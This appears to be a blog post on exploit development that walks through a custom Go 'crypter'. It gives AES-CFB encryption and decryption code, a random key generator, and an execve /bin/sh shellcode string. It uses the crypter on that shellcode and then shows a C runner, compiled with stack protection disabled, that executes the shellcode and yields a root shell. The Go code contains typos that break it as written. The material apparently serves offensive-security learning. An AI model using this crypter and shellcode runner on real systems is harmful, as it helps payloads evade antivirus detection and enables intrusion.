[ExpDev] Custom Go Crypter

What is Crypter?

Encryption Process

Decryption Process

Generate Key Code

// Random Key Generator (128 bit)var chars = []rune("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")func randKeyGen(n int) string {
charSet := make([]rune, n)
for i := range charSet {
charSet[i] = chars[math.Intn(len(chars))]
}
return string(charSet)
}

Encryption Code

// Encrypt: Original Text --> Add IV --> Encrypt with Key --> Base64 Encodefunc Encrypt(key []byte, text []byte) string {
block, err := aes.NewCipher(key)
if err != nil {
panic(err)
}
// Creating IV
cipher-text := make([]byte, aes.BlockSize+len(text))
iv := ciphertext[:aes.BlockSize]
if _, err := io.ReadFull(rand.Reader, iv); err != nil {
panic(err)
}
// Encrpytion Process
stream := cipher.NewCFBEncrypter(block, iv)
stream.XORKeyStream(ciphertext[aes.BlockSize:], text)
// Encode to Base64
return base64.URLEncoding.EncodeToString(ciphertext)
}

Decryption Code

// Decrypt: Encrypted Text --> Base64 Decode --> Decrypt with IV and Keyfunc Decrypt(key []byte, encryptedText string) string {
ciphertext, _ := base64.URLEncoding.DecodeString(encryptedText)
block, err := aes.NewCipher(key)
if err != nil {
panic(err)
}
// Using IV
iv := ciphertext[:aes.BlockSize]
// Checking BlockSize = IV
if len(iv) != aes.BlockSize {
panic("[Error] Ciphertext is too short!")
}
ciphertext = ciphertext[aes.BlockSize:] // Decryption Process
stream := cipher.NewCFBDecrypter(block, iv)
stream.XORKeyStream(ciphertext, ciphertext)
return string(ciphertext)
}

Final Testing

# go run goBase64Crypter.go "bigb0ss"
[INFO] Original Text : bigb0ss
[INFO] Random Key : Fnf4Ml3Z6MhP11qMQ0zehdp9dEj5j5Pn
[INFO] Encrypted Base64 : JpbQCdofLYb7aceWzkb2i0xNakO8aAg=

[INFO] Decrypted Text : bigb0ss
# go run goBase64Crypter.go "bigb0ss"
[INFO] Original Text : bigb0ss
[INFO] Random Key : CQroxMZRxOZlXWlU5v6yQdpzz8ibYUhp
[INFO] Encrypted Base64 : PJHvYqoEK1K5thBrPMIRqndRI8kH0f4=

[INFO] Decrypted Text : bigb0ss
# python compilerX86.py -f bin-sh[+] Assemble: bin-sh.nasm
[+] Linking: bin-sh.o
[+] Shellcode: "\xeb\x1a\x5e\x31\xdb\x88\x5e\x07\x89\x76\x08\x89\x5e\x0c\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\x31\xc0\xb0\x0b\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"
# go run goBase64Crypter.go "\xeb\x1a\x5e\x31\xdb\x88\x5e\x07\x89\x76\x08\x89\x5e\x0c\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\x31\xc0\xb0\x0b\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"[INFO] Original Text : \xeb\x1a\x5e\x31\xdb\x88\x5e\x07\x89\x76\x08\x89\x5e\x0c\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\x31\xc0\xb0\x0b\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43[INFO] Random Key : klWNvxnW1l3yjQKwe1RjxPxfXnYr1Hia[INFO] Encrypted Base64 : 3t6ZzvwR39fTwyRjR_nFOyGNqY6S65Gj9r3UApTp7cM_2-5Hq5vL3qHCu9IJkJd1OQKWzGHpNiEy90_Ii0TT_QLgKkB5uUd87RTwc0KNfoBXEv9TPkAhLOPG0tt3b2LlihCmZuDuuW55YptaSU89bU8pd4qEPy4ze9SYQHSj8vbTJU4is0VLimXyeas0Dabx0Y7P3VvsRaHlZm9JC_Eg6witdoonWzv7_ck2lw9CY3EzyaChN3HGEoPTL-fAj0AD3rCWBP7BG3WJHi9nAnQzfUbieOE=[INFO] Decrypted Text : \xeb\x1a\x5e\x31\xdb\x88\x5e\x07\x89\x76\x08\x89\x5e\x0c\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\x31\xc0\xb0\x0b\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x1a\x5e\x31\xdb\x88\x5e\x07\x89\x76\x08\x89\x5e\x0c\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\x31\xc0\xb0\x0b\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43";
main()
{
printf("Shellcode Length: %d", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
# gcc -fno-stack-protector -z execstack -o shellcode shellcode.c -w# ./shellcode 
# id
uid=0(root) gid=0(root) groups=0(root)
# exit

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store